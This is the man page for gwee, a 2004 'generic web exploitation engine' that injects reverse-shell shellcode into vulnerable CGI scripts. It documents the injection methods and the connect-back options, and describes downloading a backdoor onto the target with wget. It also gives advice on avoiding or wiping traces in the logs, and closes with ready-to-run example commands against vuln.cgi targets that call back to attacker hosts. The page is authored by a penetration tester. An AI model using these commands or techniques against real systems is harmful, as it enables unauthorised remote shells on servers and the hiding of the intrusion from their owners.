|-h||Display help (you can execute gwee without arguments too).|
|The parameter to insert before the shellcode injection command line is inserted. The shellcode is inserted between the values of the -y option and the -z option. In POST requests (default behaviour), the -y and -z options go into the POST data, not in the URL. In GET and HEAD requests, the "-y <shellcode> -z" option combination is appended to the URL. If you need to add a ? you can do that either in the URL or as the first char of the -y option. By default, -y and -z are empty.|
String to append after the shellcode injection command. By default, the -z
string is empty. An example usage of the -y -z option combo would be:
$ gwee -H -y ?testvar= -z | target/cgi-bin/test.cgi
This will resolve into:
http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|Of course, you could have done it this way too, same result:
This will resolve into:
|-G||Use HTTP GET instead of POST. This is not recommended since nasty long tell-tail strings will end up in the access_log. In order for the whole payload to fit into a 1024 byte GET request, the shellcode is split up into 4 separate requests, all producing nasty logs. -H Use HTTP HEAD instead of POST/GET. Read about -G, the same nasty logs will appear on the target and the shellcode will be split into 4 requests.|
|The IP or hostname to have the shellcode connect back to. Hostnames will be resolved into IP numbers, since thats the only method used by the binary shellcodes.|
|The port to connect back to, default is 31337.|
Choose which shellcode to install on the target:
0 = Sabus Perl shellcode (default if -s is omitted) 1 = Linux x86 binary 2 = FreeBSD x86 binary 3 = NetBSD x86 binary 4 = Sabus Python shellcode (the target must have Python installed)
Choose shellcode injection method:
0 = perl -e "print 1 = python -c "__import__( 2 = printf "<hex>" 3 = echo -ne "<hex>" (works only if targets /bin/sh is bash)
Choose a prefix to the shellcode injection method, e.g.:
-i1 -I /usr/local/bin/that would parse it into: /usr/local/bin/python -c... default is empty (the preferred way).
|Choose a different temporary filename for the shellcode/backdoor on the target than the default.|
|-a user agent string|
Choose user agent string, e.g.:
-a "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"If -a is omitted, gwee will randomize from 25 real user-agent strings.
|-v||Be really verbose, disclose exactly which commands are being executed.|
|-q||Be really silent, only output error messages, nothing else.|
|-L||Run built-in tcp listener (no need to use "nc -l").|
|-A||Only listen for incoming connection on -p port, nothing else. This is just like: nc -l -p port -w timeout|
|Time-out in seconds until listener (-L) times out. Default is -t30 (30 seconds), -t0 means no time-out.|
|-f||Simply non-interactive, you dont need to press return to proceed.|
|If you specify the -w option, the injection methods wont be used. Instead "wget -Yoff -q -O <bd> <url>" will be executed on the target to download a reverse shellcode/backdoor that will consequently be execute as per usual. Use the -d option to dump a shellcode that you can upload somewhere.|
This option will dump shellcode instead of injecting it somewhere. You use the
-l -p and -s options as usual, but instead of connecting somewhere, the
generated shellcode will be dumped to a file you specify after the -d. Upload
this file to a webserver and use its URL with the -w option. For example,
this command will dump x86 Linux sishell:
$ gwee -lyourhostname. -p1337 -s1 -d bd $ scp bd leet@host:/wwwroot/ $ gwee -w http://host/bd -LG -p1337 target/cgi-bin/vuln.cgi?
|-P||Preserve the shellcode after injection. Normally, the exploit will send a HTTP POST, HEAD or GET request trying to execute "rm -f /var/tmp/.vetx.95" This will leave nasty logs even after you wipe yourself from the logs. If you know youll get a shell on a box, use the -P option with the -L option. Once connected with -L, itll automatically send a "shred -fu ; rm -f" over the connected socket.|
|-r||Remove created backdoor file (shellcode) on the target. This is done automatically, but you still have the choice to explicitly do a remove.|
gwee -y q=%3B -l fubar.org. -p 6666 -L https://target/cgi-bin/vuln.cgi gwee -y?cmd= -z| -G -l mydom.tld -p 9000 -s1 -i3 -Lf target/vuln.pl gwee -yloginname=%3B -l mydom.tld -p80 -Lf https://target/userstat.pl gwee -A -p 6666 -t0 -q
gwee - generic web exploitation engine Copyright (C) 2004 Michel Blomgren <firstname.lastname@example.org> Perl and Python shellcode and expertise by Sabu <email@example.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
My name is Michel Blomgren. Im an information security consultant specializing in risk/vulnerability assessment and penetration testing with Cycom AB, www.cycom.se. Im the developer of SENTINIX, a GNU/Linux distribution designed for monitoring, intrusion detection, anti-spam, anti-virus and clustering. You may contact me by sending an e-mail to <firstname.lastname@example.org>. If you like to keep the conversation private, fetch my PGP public key on http://www.cycom.se/misc/pubkeymichel.asc (886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA).
|gwee||GWEE (1)||May 2004|